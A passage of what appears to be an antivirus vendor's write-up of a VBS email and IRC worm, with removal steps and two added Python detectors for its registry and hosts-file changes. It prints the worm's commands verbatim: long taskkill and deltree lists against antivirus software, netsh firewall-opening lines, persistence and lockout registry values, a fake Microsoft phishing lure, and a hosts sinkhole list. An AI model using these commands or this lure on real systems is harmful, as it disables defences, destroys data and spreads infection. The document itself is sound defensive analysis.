@taskkill /IM RULAUNCH.exe /F
@taskkill /IM RUN32DLL.exe /F
@taskkill /IM RUNDLL.exe /F
@taskkill /IM RUNDLL16.exe /F
@taskkill /IM RUXDLL32.exe /F
@taskkill /IM SAFEWEB.exe /F
@taskkill /IM SAHAGENT.exe /F
@taskkill /IM SAVE.exe /F
@taskkill /IM SAVENOW.exe /F
@taskkill /IM SBSERV.exe /F
@taskkill /IM SC.exe /F
@taskkill /IM SCAM32.exe /F
@taskkill /IM SCAN32.exe /F
@taskkill /IM SCAN95.exe /F
@taskkill /IM SCANPM.exe /F
@taskkill /IM SCRSCAN.exe /F
@taskkill /IM SETUPVAMEEVAL.exe /F
@taskkill /IM SETUP_FLOWPROTECTOR_US.exe /F
@taskkill /IM SFC.exe /F
@taskkill /IM SGSSFW32.exe /F
@taskkill /IM SH.exe /F
@taskkill /IM SHELLSPYINSTALL.exe /F
@taskkill /IM SHN.exe /F
@taskkill /IM SHOWBEHIND.exe /F
@taskkill /IM SMC.exe /F
@taskkill /IM SMS.exe /F
@taskkill /IM SMSS32.exe /F
@taskkill /IM SOAP.exe /F
@taskkill /IM SOFI.exe /F
@taskkill /IM SPERM.exe /F
@taskkill /IM SPF.exe /F
@taskkill /IM SPHINX.exe /F
@taskkill /IM SPOLER.exe /F
@taskkill /IM SPOOLCV.exe /F
@taskkill /IM SPOOLSV32.exe /F
@taskkill /IM SPYXX.exe /F
@taskkill /IM SREXE.exe /F
@taskkill /IM SRNG.exe /F
@taskkill /IM SS3EDIT.exe /F
@taskkill /IM SSGRATE.exe /F
@taskkill /IM SSG_4104.exe /F
@taskkill /IM ST2.exe /F
@taskkill /IM START.exe /F
@taskkill /IM STCLOADER.exe /F
@taskkill /IM SUPFTRL.exe /F
@taskkill /IM SUPPORT.exe /F
@taskkill /IM SUPPORTER5.exe /F
@taskkill /IM SVC.exe /F
@taskkill /IM SVCHOSTC.exe /F
@taskkill /IM SVCHOSTS.exe /F
@taskkill /IM SVSHOST.exe /F
@taskkill /IM SWEEP95.exe /F
@taskkill /IM SWEEPNET.SWEEPSRV.SYS.SWNETSUP.exe /F
@taskkill /IM SYMPROXYSVC.exe /F
@taskkill /IM SYMTRAY.exe /F
@taskkill /IM SYSEDIT.exe /F
@taskkill /IM SYSTEM.exe /F
@taskkill /IM SYSTEM32.exe /F
@taskkill /IM SYSUPD.exe /F
@taskkill /IM TASKMG.exe /F
@taskkill /IM TASKMO.exe /F
@taskkill /IM TASKMON.exe /F
@taskkill /IM TAUMON.exe /F
@taskkill /IM TBSCAN.exe /F
@taskkill /IM TC.exe /F
@taskkill /IM TCA.exe /F
@taskkill /IM TCM.exe /F
@taskkill /IM TDS-3.exe /F
@taskkill /IM TDS2-NT.exe /F
@taskkill /IM TEEKIDS.exe /F
@taskkill /IM TFAK.exe /F
@taskkill /IM TFAK5.exe /F
@taskkill /IM TGBOB.exe /F
@taskkill /IM TITANIN.exe /F
@taskkill /IM TITANINXP.exe /F
@taskkill /IM TRACERT.exe /F
@taskkill /IM TRICKLER.exe /F
@taskkill /IM TRJSCAN.exe /F
@taskkill /IM TRJSETUP.exe /F
@taskkill /IM TROJANTRAP3.exe /F
@taskkill /IM TSADBOT.exe /F
@taskkill /IM TVMD.exe /F
@taskkill /IM TVTMD.exe /F
@taskkill /IM UNDOBOOT.exe /F
@taskkill /IM UPDAT.exe /F
@taskkill /IM UPDATE.exe /F
@taskkill /IM UPDATE.exe /F
@taskkill /IM UPGRAD.exe /F
@taskkill /IM UTPOST.exe /F
@taskkill /IM VBCMSERV.exe /F
@taskkill /IM VBCONS.exe /F
@taskkill /IM VBUST.exe /F
@taskkill /IM VBWIN9X.exe /F
@taskkill /IM VBWINNTW.exe /F
@taskkill /IM VCSETUP.exe /F
@taskkill /IM VET32.exe /F
@taskkill /IM VET95.exe /F
@taskkill /IM VETTRAY.exe /F
@taskkill /IM VFSETUP.exe /F
@taskkill /IM VIR-HELP.exe /F
@taskkill /IM VIRUSMDPERSONALFIREWALL.exe /F
@taskkill /IM VNLAN300.exe /F
@taskkill /IM VNPC3000.exe /F
@taskkill /IM VPC32.exe /F
@taskkill /IM VPC42.exe /F
@taskkill /IM VPFW30S.exe /F
@taskkill /IM VPTRAY.exe /F
@taskkill /IM VSCAN40.exe /F
@taskkill /IM VSCENU6.02D30.exe /F
@taskkill /IM VSCHED.exe /F
@taskkill /IM VSECOMR.exe /F
@taskkill /IM VSHWIN32.exe /F
@taskkill /IM VSISETUP.exe /F
@taskkill /IM VSMAIN.exe /F
@taskkill /IM VSMON.exe /F
@taskkill /IM VSSTAT.exe /F
@taskkill /IM VSWIN9XE.exe /F
@taskkill /IM VSWINNTSE.exe /F
@taskkill /IM VSWINPERSE.exe /F
@taskkill /IM W32DSM89.exe /F
@taskkill /IM W9X.exe /F
@taskkill /IM WATCHDOG.exe /F
@taskkill /IM WEBDAV.exe /F
@taskkill /IM WEBSCANX.exe /F
@taskkill /IM WEBTRAP.exe /F
@taskkill /IM WFINDV32.exe /F
@taskkill /IM WHOSWATCHINGME.exe /F
@taskkill /IM WIMMUN32.exe /F
@taskkill /IM WIN-BUGSFIX.exe /F
@taskkill /IM WIN32.exe /F
@taskkill /IM WIN32US.exe /F
@taskkill /IM WINACTIVE.exe /F
@taskkill /IM WINDOW.exe /F
@taskkill /IM WINDOWS.exe /F
@taskkill /IM WININETD.exe /F
@taskkill /IM WININIT.exe /F
@taskkill /IM WININITX.exe /F
@taskkill /IM WINLOGIN.exe /F
@taskkill /IM WINMAIN.exe /F
@taskkill /IM WINNET.exe /F
@taskkill /IM WINPPR32.exe /F
@taskkill /IM WINRECON.exe /F
@taskkill /IM WINSERVN.exe /F
@taskkill /IM WINSSK32.exe /F
@taskkill /IM WINSTART.exe /F
@taskkill /IM WINSTART001.exe /F
@taskkill /IM WINTSK32.exe /F
@taskkill /IM WINUPDATE.exe /F
@taskkill /IM WKUFIND.exe /F
@taskkill /IM WNAD.exe /F
@taskkill /IM WNT.exe /F
@taskkill /IM WRADMIN.exe /F
@taskkill /IM WRCTRL.exe /F
@taskkill /IM WSBGATE.exe /F
@taskkill /IM WUPDATER.exe /F
@taskkill /IM WUPDT.exe /F
@taskkill /IM WYVERNWORKSFIREWALL.exe /F
@taskkill /IM XPF202EN.exe /F
@taskkill /IM ZAPRO.exe /F
@taskkill /IM ZAPSETUP3001.exe /F
@taskkill /IM ZATUTOR.exe /F
@taskkill /IM ZONALM2601.exe /F
@taskkill /IM ZONEALARM.exe /F
@taskkill /IM _AVP32.exe /F
@taskkill /IM _AVPCC.exe /F
@taskkill /IM _AVPM.exe /F
@taskkill /IM CMD.exe /F
@taskkill /IM TASKMGR.EXE /F
@taskkill /IM NEC.EXE /F


Overwrites C:\WINDOWS\System32\Firewall.bat with the following lines:

@netsh firewall add portopening tcp 7 Echo
@netsh firewall add portopening tcp 443 HTTPS
@netsh firewall add portopening tcp 445 Echo Request
@netsh firewall add portopening tcp 135 File Sharing
@netsh firewall add portopening tcp 137 File Sharing
@netsh firewall add portopening tcp 139 File Sharing
@netsh firewall add portopening tcp 110 POP3
@netsh firewall add portopening tcp 109 POP2
@netsh firewall add portopening tcp 21 FTP
@netsh firewall add portopening tcp 20 FTP-Data
@netsh firewall add portopening tcp 25 SMTP
@netsh firewall add portopening tcp 23 Telnet
@netsh firewall add portopening tcp 22 SSH
@netsh firewall add portopening tcp 80 HTTP
@netsh firewall add portopening tcp 8080 HTTP Proxy
@netsh firewall add portopening tcp 5554 Backdoor
@netsh firewall add portopening tcp 1080 Proxy
@netsh firewall add portopening tcp 3389 Remote Destop
@netsh firewall add portopening tcp 4899 Remote Administrator
@netsh firewall add portopening tcp 5800 VNC
@netsh firewall add portopening tcp 5900 VNC
@netsh firewall add portopening tcp 6667 Backdoor
@netsh firewall add portopening tcp 42 WINS
@netsh firewall add portopening tcp 256 Firewall
@netsh firewall add portopening tcp 257 Firewall
@netsh firewall add portopening tcp 259 Firewall
@netsh firewall add portopening tcp 70 gopher
@netsh firewall add portopening tcp 79 Finger
@netsh firewall add portopening tcp 53 DNS
@netsh firewall add portopening tcp 258 Firewall
@netsh firewall add portopening tcp 1745 PPTP
@netsh firewall add portopening tcp 1723 PPTP
@netsh firewall add portopening udp 69 UDP
@netsh firewall add portopening udp 53 DNS Server
@netsh firewall add portopening udp 1810 IAS
@netsh firewall add portopening udp 1811 IAS


Adds the values:

"WINLOGON" = "wscript.exe C:\Windows\System32\WINLOGON.vbs %"
"Tasmgr" = "C:\WINDOWS\System32\Taskmgr.bat"
"Firewall" = "C:\WINDOWS\System32\Firewall.bat"

to the registry subkey:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Run

so that the worm and the modified .bat files are executed every time Windows starts.


Adds the value:

"Event17" = "dcc send $nick C:\Virc\Sexy Girls.mpg.vbs"

to the registry subkey:

HKEY_CURRENT_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events

to allow it to spread through IRC channels.


Adds the values:

"1" = "regedit.exe"
"2" = "regedt32.exe"
"3" = "taskmgr.exe"
"4" = "wuauclt1.exe"
"5" = "wuauclt.exe"
"6" = "wupdmgr.exe"
"7" = "vptray.exe"
"8" = "wupdmgr.exe"
"9" = "vpc32.exe"
"10" = "LUAll.exe"

to the registry subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun

to lower the security settings and disable some security-related programs.


Adds the values:

"DisableRegistryTools" = "1"
"DisableTaskMgr" = "1"
"NoVirtMemPage" = "1"

to the subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

to disable some security-related programs.


Adds the values:

"FirewallDisableNotify" = "1"
"FirewallOverride" = "1"
"UpdatesDisableNotify" = "1"
"AntivirusDisableNotify" = "1"

to the registry subkey:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center

to lower the security settings.


Adds the value:

"Disabled" = "1"

to the subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp


Adds the value:

"NoControlPanel" = "1"

to the subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer


Adds the value:

"WinStationsDisabled" = "1"

to the subkey:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon


Adds the value:

"AUOptions" = "1"

to the subkey:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update


Adds the value:

"DomainProfile" = "1"

to the subkey:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\WindowsFirewall


Adds the value:

"EnableFirewall" = "1"

to the subkey:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\WindowsFirewall\StandardProfile


Adds the values:

"DisableNotifications" = "1"
"EnableFirewall" = "0"

to the subkey:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile


Adds the value:

"ServiceUpgrade" = "0"

to the subkey:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Setup


Adds the value:

"wscsvc" = "4"

to the subkey:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services


Adds the value:

"Start" = "4"

to the subkey:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess


Deletes the following registry entry:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\HTTPFilter\Parameters\description
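
The registry changes listed above are the most durable trace the worm leaves: the Run entries re-launch it at boot, the Policies values lock the user out of regedit and Task Manager, and the Security Center values silence the warnings that would otherwise expose the disabled firewall and antivirus. The script below is an added example for this page, not Symantec's write-up code and not the worm's; it audits a registry snapshot for exactly those values. The key and value names come from the write-up; the snapshot format (a dict of (hive, subkey) -> {value name: data}), the function names and the sample snapshots are this example's own assumptions. On Windows, collect_snapshot() reads the keys with the standard winreg module; elsewhere a snapshot can be built from a .reg export and passed to audit().

```python
"""Audit a registry snapshot for the persistence and policy values that
VBS.Ypsan.G@mm is described as writing.  Added example, not Symantec's or
the worm's code; snapshot format, function names and sample data are this
example's own assumptions."""
import sys

# (hive, subkey) -> {value name: data the worm writes}.  None means any data
# under that value name is worth reporting (the Run entries).
INDICATORS = {
    ("HKLM", r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Run"): {
        "WINLOGON": None, "Tasmgr": None, "Firewall": None,
    },
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Policies\System"): {
        "DisableRegistryTools": "1", "DisableTaskMgr": "1", "NoVirtMemPage": "1",
    },
    ("HKLM", r"SOFTWARE\Microsoft\Security Center"): {
        "FirewallDisableNotify": "1", "FirewallOverride": "1",
        "UpdatesDisableNotify": "1", "AntivirusDisableNotify": "1",
    },
    ("HKLM", r"SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile"): {
        "DisableNotifications": "1", "EnableFirewall": "0",
    },
}

# Programs the worm lists under Policies\Explorer\DisallowRun.  The value
# names there are just "1".."10", so the data is what identifies the tampering.
DISALLOW_RUN_KEY = ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun")
DISALLOWED_PROGRAMS = {"regedit.exe", "regedt32.exe", "taskmgr.exe", "wuauclt1.exe",
                       "wuauclt.exe", "wupdmgr.exe", "vptray.exe", "vpc32.exe", "luall.exe"}


def audit(snapshot):
    """Return findings as (hive, subkey, value name, data) tuples.

    Data may be str (REG_SZ) or int (REG_DWORD), so it is compared as a string."""
    findings = []
    for key, expected in INDICATORS.items():
        present = snapshot.get(key, {})
        for name, bad in expected.items():
            if name in present and (bad is None or str(present[name]) == bad):
                findings.append((key[0], key[1], name, str(present[name])))
    for name, data in snapshot.get(DISALLOW_RUN_KEY, {}).items():
        if str(data).lower() in DISALLOWED_PROGRAMS:
            findings.append((DISALLOW_RUN_KEY[0], DISALLOW_RUN_KEY[1], name, str(data)))
    return findings


def collect_snapshot():
    """Read the indicator keys from the live registry (Windows only)."""
    import winreg  # only importable on Windows
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    snapshot = {}
    for hive, subkey in list(INDICATORS) + [DISALLOW_RUN_KEY]:
        try:
            with winreg.OpenKey(hives[hive], subkey) as k:
                values, i = {}, 0
                while True:
                    try:
                        name, data, _type = winreg.EnumValue(k, i)
                    except OSError:
                        break  # no more values under this key
                    values[name] = data
                    i += 1
        except OSError:
            continue  # key absent: nothing to report for it
        snapshot[(hive, subkey)] = values
    return snapshot


# Constructed samples: a clean host, and one showing the changes described above.
CLEAN_SNAPSHOT = {
    ("HKLM", r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Run"): {},
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Policies\System"): {},
}
INFECTED_SNAPSHOT = {
    ("HKLM", r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Run"): {
        "WINLOGON": r"wscript.exe C:\Windows\System32\WINLOGON.vbs %",
        "Tasmgr": r"C:\WINDOWS\System32\Taskmgr.bat",
    },
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Policies\System"): {
        "DisableRegistryTools": 1, "DisableTaskMgr": 1,  # REG_DWORD data
    },
    DISALLOW_RUN_KEY: {"1": "regedit.exe", "2": "regedt32.exe", "3": "notepad.exe"},
}

if __name__ == "__main__":
    snap = collect_snapshot() if sys.platform == "win32" else INFECTED_SNAPSHOT
    for hive, subkey, name, data in audit(snap):
        print(f"{hive}\\{subkey}  {name} = {data}")
```

Run on the constructed infected snapshot it reports six findings (two Run entries, two Policies\System values and the two DisallowRun entries that name tools from the write-up's list; the constructed notepad.exe entry is ignored) and nothing for the clean one. Absent keys are simply skipped, so the same check is safe on a host that never had a Security Center or firewall policy key.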


Uses Microsoft Outlook to send itself to all the contacts in the Windows Address Book. The email has the following characteristics:

Subject: Your Microsoft Firewall Help

Message Body:
Microsoft found a problem in your last update with your Windows Firewall. To fix the problem you must install the attached file.
Microsoft (R)
http://windowsupdate.microsoft.com

Attachment: WINLOGON.vbs


If mIRC is installed on the compromised computer, the worm modifies the script.ini file so that the file c:\windows\system\porno.vbs is sent to all other users on the IRC channel.


Modifies all files with the extension .iis in C:\Windows\Inf by adding the following text:

Source: C:\WINDOWS\System32\WINLOGON.vbs; DestDir: {app}; Flags: ignoreversion


Attempts to shut down computers with the following IP addresses:


192.168.1.15
192.168.1.16
192.168.1.17
192.168.1.18
192.168.1.19
192.168.1.20
192.168.1.21
192.168.1.22
192.168.1.23
192.168.1.24
192.168.1.25
192.168.1.26
192.168.1.27
192.168.1.28
192.168.1.29
192.168.1.30
192.168.1.31
192.168.1.32
192.168.1.33
192.168.1.34
192.168.1.35
192.168.1.36
192.168.1.37
192.168.1.38
192.168.1.39
192.168.1.40
192.168.1.41
192.168.1.42
192.168.1.43
192.168.1.44
192.168.1.45
192.168.1.46
192.168.1.47
192.168.1.101
192.168.1.102
192.168.1.103
192.168.1.104
192.168.1.105
192.168.1.106
192.168.1.107
192.168.1.108
192.168.1.109
192.168.1.111
192.168.1.112
192.168.1.113
192.168.1.114
192.168.1.115
192.168.1.116
192.168.1.117
192.168.1.118
192.168.1.119
192.168.1.120
192.168.15.100
192.168.15.101
192.168.15.102
192.168.15.103
192.168.15.104
192.168.15.105
192.168.15.106
192.168.15.107
192.168.15.108
192.168.15.109
192.168.15.111
192.168.15.112
192.168.15.113
192.168.15.114
192.168.15.115
192.168.15.116
192.168.15.117
192.168.15.118
192.168.15.119
192.168.15.120


Adds the following text to the C:\WINDOWS\system32\drivers\etc\hosts file to prevent access to several Web sites, some of which may be security-related:

127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.grisoft.com
127.0.0.1 www.microsoft.com
127.0.0.1 microsoft.com
127.0.0.1 www.msn.com
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 www.oxyd.fr
127.0.0.1 oxyd.fr
127.0.0.1 www.t35.com
127.0.0.1 t35.com
127.0.0.1 www.t35.net
127.0.0.1 t35.net
127.0.0.1 www.norton.com
127.0.0.1 www.sarc.com
127.0.0.1 downloads-us1.kaspersky-labs.com
127.0.0.1 updates1.kaspersky-labs.com
127.0.0.1 updates2.kaspersky-labs.com
127.0.0.1 updates3.kaspersky-labs.com
127.0.0.1 downloads1.kaspersky-labs.com
127.0.0.1 downloads2.kaspersky-labs.com
127.0.0.1 downloads3.kaspersky-labs.com
127.0.0.1 ftp.downloads1.kaspersky-labs.com
127.0.0.1 ftp.downloads2.kaspersky-labs.com
127.0.0.1 ftp.downloads3.kaspersky-labs.com
127.0.0.1 ftp.symantec.com
127.0.0.1 windowsupdate.microsoft.com
127.0.0.1 officeupdate.microsoft.com
127.0.0.1 www.kddi.de
127.0.0.1 www.uni-cert.nl
127.0.0.1 www.sarc.com
127.0.0.1 www.thesecure.net
127.0.0.1 www.downloads.com
127.0.0.1 www.spacelink.com.au
127.0.0.1 www.akonix.com
127.0.0.1 www.linknet.com.au
127.0.0.1 www.techzoom.net
127.0.0.1 content.tibs.at
127.0.0.1 www.corsaire.com
127.0.0.1 jp.fujitsu.com
127.0.0.1 www.tmsr.net
127.0.0.1 www.kp24.de
127.0.0.1 www.headliner.org
127.0.0.1 newsflash.nifty.com
127.0.0.1 www.cjmtechs.com
127.0.0.1 www.yuikee.com.hk
127.0.0.1 www.hackzona.ru
127.0.0.1 www.xpect.ch
127.0.0.1 computers.yahoo.co.jp
127.0.0.1 kuro.nobody.jp
127.0.0.1 citadelle.intrinsec.com
127.0.0.1 computer.msn.co.jp
127.0.0.1 www.south.rit.ac.th
127.0.0.1 d.hatena.ne.jp
127.0.0.1 www.oct-net.ne.jp
127.0.0.1 bbs.whnet.edu.cn
127.0.0.1 www.tac.cz
127.0.0.1 omakase.jp
127.0.0.1 stats.epiknet.org
127.0.0.1 www.alter-net.com
127.0.0.1 sid.softek.co.jp
127.0.0.1 news.goo.ne.jp
127.0.0.1 www.fken.ise.osaka-sandai.ac.jp
127.0.0.1 www.rolan.si
127.0.0.1 www.searchready.co.uk
127.0.0.1 192.168.1.1
127.0.0.1 192.168.15.1
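
The hosts file is worth auditing on its own, because a poisoned entry survives removal of the worm and silently keeps antivirus updates from arriving. The following is an added example, not part of the original writeup: it parses a hosts file and reports every line that maps a security-vendor or update domain, or a private LAN address such as the gateway, to a loopback address, while leaving the legitimate `localhost` lines alone. The watched domain suffixes are a subset taken from the list above; the sample hosts content is constructed and is not a real capture.

```python
"""Report hosts-file entries that sinkhole security vendors or the local
gateway to loopback, as described in the writeup.  Added example; the
watched suffixes come from the writeup's list, the sample is constructed."""
import ipaddress

# Domain suffixes from the writeup's hosts list.  Any hostname equal to one of
# these, or under it, that resolves to loopback via hosts is reported.
WATCHED_SUFFIXES = (
    "symantec.com", "symantecliveupdate.com", "sophos.com", "mcafee.com",
    "f-secure.com", "kaspersky.com", "kaspersky-labs.com", "avp.com",
    "trendmicro.com", "grisoft.com", "microsoft.com", "virustotal.com",
    "ca.com", "nai.com", "norton.com", "sarc.com", "viruslist.com",
)


def parse_hosts(text):
    """Yield (address, hostname, line_number) for every mapping in a hosts
    file; '#' comments and blank lines are skipped, one line may list
    several hostnames."""
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        parts = line.split()
        if len(parts) < 2:
            continue
        for host in parts[1:]:
            yield parts[0], host, number


def _is_loopback(addr):
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def _is_private_ip(host):
    """True when the 'hostname' column is itself a private IPv4/IPv6 address
    (the worm maps 192.168.1.1 and 192.168.15.1 this way)."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False


def _is_watched(host):
    h = host.lower().rstrip(".")
    return any(h == s or h.endswith("." + s) for s in WATCHED_SUFFIXES)


def find_hijacked_entries(text):
    """Return [(line_number, address, hostname)] for every loopback mapping of
    a watched domain or of a private address.  Ordinary 'localhost' lines and
    internal mappings to non-loopback addresses are not reported."""
    hits = []
    for addr, host, number in parse_hosts(text):
        if _is_loopback(addr) and (_is_watched(host) or _is_private_ip(host)):
            hits.append((number, addr, host))
    return hits


# Constructed sample (not a real capture).
SAMPLE_HOSTS = """# constructed sample hosts file
127.0.0.1       localhost
::1             localhost
127.0.0.1 www.symantec.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 windowsupdate.microsoft.com
127.0.0.1 192.168.1.1
10.0.0.5 intranet.example.test   # ordinary internal mapping, not flagged
"""

if __name__ == "__main__":
    for number, addr, host in find_hijacked_entries(SAMPLE_HOSTS):
        print(f"line {number}: {addr} {host}")
```

On Windows the file lives at the path given above; on a machine under investigation read it from an offline copy of the system drive rather than the live system. Suffix matching is deliberately anchored on a dot boundary, so `www.myca.com` does not match the `ca.com` entry.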


Runs the file C:\WINDOWS\System32\Firewall.bat.


Displays a message box containing the following text:

Title: Firewall Update

Message body: Install Successful.
===============================================
To delete the value from the registry
Click Start > Run.
Type regedit
Click OK.
Navigate to the subkey:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Run


In the right pane, delete the values:

"WINLOGON" = "wscript.exe C:\Windows\System32\WINLOGON.vbs %"
"Tasmgr" = "C:\WINDOWS\System32\Taskmgr.bat"
"Firewall" = "C:\WINDOWS\System32\Firewall.bat"


Navigate to the subkey:

HKEY_CURRENT_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events


In the right pane, delete the value:

"Event17" = "dcc send $nick C:\Virc\Sexy Girls.mpg.vbs"


Navigate to the subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun


In the right pane, delete the values:

"1" = "regedit.exe"
"2" = "regedt32.exe"
"3" = "taskmgr.exe"
"4" = "wuauclt1.exe"
"5" = "wuauclt.exe"
"6" = "wupdmgr.exe"
"7" = "vptray.exe"
"8" = "wupdmgr.exe"
"9" = "vpc32.exe"
"10" = "LUAll.exe"


Navigate to the subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System


In the right pane, delete the values:

"DisableTaskMgr" = "1"
"NoVirtMemPage" = "1"


Navigate to the subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp


In the right pane, delete the value:

"Disabled" = "1"


Exit the Registry Editor.


6. To edit the Autoexec.bat file
If you are running Windows 95/98/Me, follow these steps:

The function you perform depends on your operating system:
Windows 95/98: Go to step B.
Windows Me: If you are running Windows Me, the Windows Me file-protection process may have made a backup copy of the Autoexec.bat file that you need to edit. If this backup copy exists, it will be in the C:\Windows\Recent folder. Symantec recommends that you delete this file before continuing with the steps in this section. To do this:
Start Windows Explorer.
Browse to and select the C:\Windows\Recent folder.
In the right pane, select the Autoexec.bat file and delete it.


Click Start, and then click Run.
Type the following, and then click OK.

edit c:\autoexec.bat


Delete the following lines:

@deltree/y c:\antiba~1\*.* >nul
@deltree/y c:\antiba~2\*.* >nul
@deltree/y c:\antiba~1.1\*.* >nul
@deltree/y c:\antiba~1.2\*.* >nul
@deltree/y c:\antiba~1.3\*.* >nul
@deltree/y c:\antiba~1.4\*.* >nul
@deltree/y c:\antiba~1.5\*.* >nul
@deltree/y c:\antiba~1.6\*.* >nul
@deltree/y c:\antiba~1.7\*.* >nul
@deltree/y c:\antiba~1.8\*.* >nul
@deltree/y c:\antivi~1\*.* >nul
@deltree/y c:\antivi~2\*.* >nul
@deltree/y c:\antiviru\*.* >nul
@deltree/y c:\avg\*.* >nul
@deltree/y c:\avp\*.* >nul
@deltree/y c:\avp30\*.* >nul
@deltree/y c:\avx\*.* >nul
@deltree/y c:\avpers~1\*.* >nul
@deltree/y c:\bitdef~1\*.* >nul
@deltree/y c:\bitdef~2\*.* >nul
@deltree/y c:\comman~1\*.* >nul
@deltree/y c:\cleancih\*.* >nul
@deltree/y c:\esafen\*.* >nul
@deltree/y c:\findvi~1\*.* >nul
@deltree/y c:\f-macro\*.* >nul
@deltree/y c:\f-prot\*.* >nul
@deltree/y c:\f-prot95\*.* >nul
@deltree/y c:\f-secu~1\*.* >nul
@deltree/y c:\fwin\*.* >nul
@deltree/y c:\fwin32\*.* >nul
@deltree/y c:\inocul~1\*.* >nul
@deltree/y c:\inocul~2\*.* >nul
@deltree/y c:\kasper~1\*.* >nul
@deltree/y c:\kasper~2\*.* >nul
@deltree/y c:\mcafee\*.* >nul
@deltree/y c:\mcafee~1\*.* >nul
@deltree/y c:\msav\*.* >nul
@deltree/y c:\norman\*.* >nul
@deltree/y c:\norton~1\*.* >nul
@deltree/y c:\norton~2\*.* >nul
@deltree/y c:\pav\*.* >nul
@deltree/y c:\pccill~1\*.* >nul
@deltree/y c:\pc-cil~1\*.* >nul
@deltree/y c:\rav\*.* >nul
@deltree/y c:\softwin\*.* >nul
@deltree/y c:\tbav\*.* >nul
@deltree/y c:\tbavw95\*.* >nul
@deltree/y c:\toolkit\*.* >nul
@deltree/y c:\trendm~1\*.* >nul
@deltree/y c:\trex\*.* >nul
@deltree/y c:\virus\*.* >nul
@deltree/y c:\vpc\*.* >nul
@deltree/y c:\vs95\*.* >nul
@deltree/y c:\zonela~1\*.* >nul
@deltree/y c:\zonela~2\*.* >nul
@deltree/y c:\progra~1\antiba~1\*.* >nul
@deltree/y c:\progra~1\antiba~2\*.* >nul
@deltree/y c:\progra~1\antiba~1.1\*.* >nul
@deltree/y c:\progra~1\antiba~1.2\*.* >nul
@deltree/y c:\progra~1\antiba~1.3\*.* >nul
@deltree/y c:\progra~1\antiba~1.4\*.* >nul
@deltree/y c:\progra~1\antiba~1.5\*.* >nul
@deltree/y c:\progra~1\antiba~1.6\*.* >nul
@deltree/y c:\progra~1\antiba~1.7\*.* >nul
@deltree/y c:\progra~1\antiba~1.8\*.* >nul
@deltree/y c:\progra~1\antivi~1\*.* >nul
@deltree/y c:\progra~1\antivi~2\*.* >nul
@deltree/y c:\progra~1\avg\*.* >nul
@deltree/y c:\progra~1\avp\*.* >nul
@deltree/y c:\progra~1\avx\*.* >nul
@deltree/y c:\progra~1\avx2000\*.* >nul
@deltree/y c:\progra~1\avpers~1\*.* >nul
@deltree/y c:\progra~1\bitdef~1\*.* >nul
@deltree/y c:\progra~1\bitdef~2\*.* >nul
@deltree/y c:\progra~1\comman~1\*.* >nul
@deltree/y c:\progra~1\common~1\avpsha~1\*.* >nul
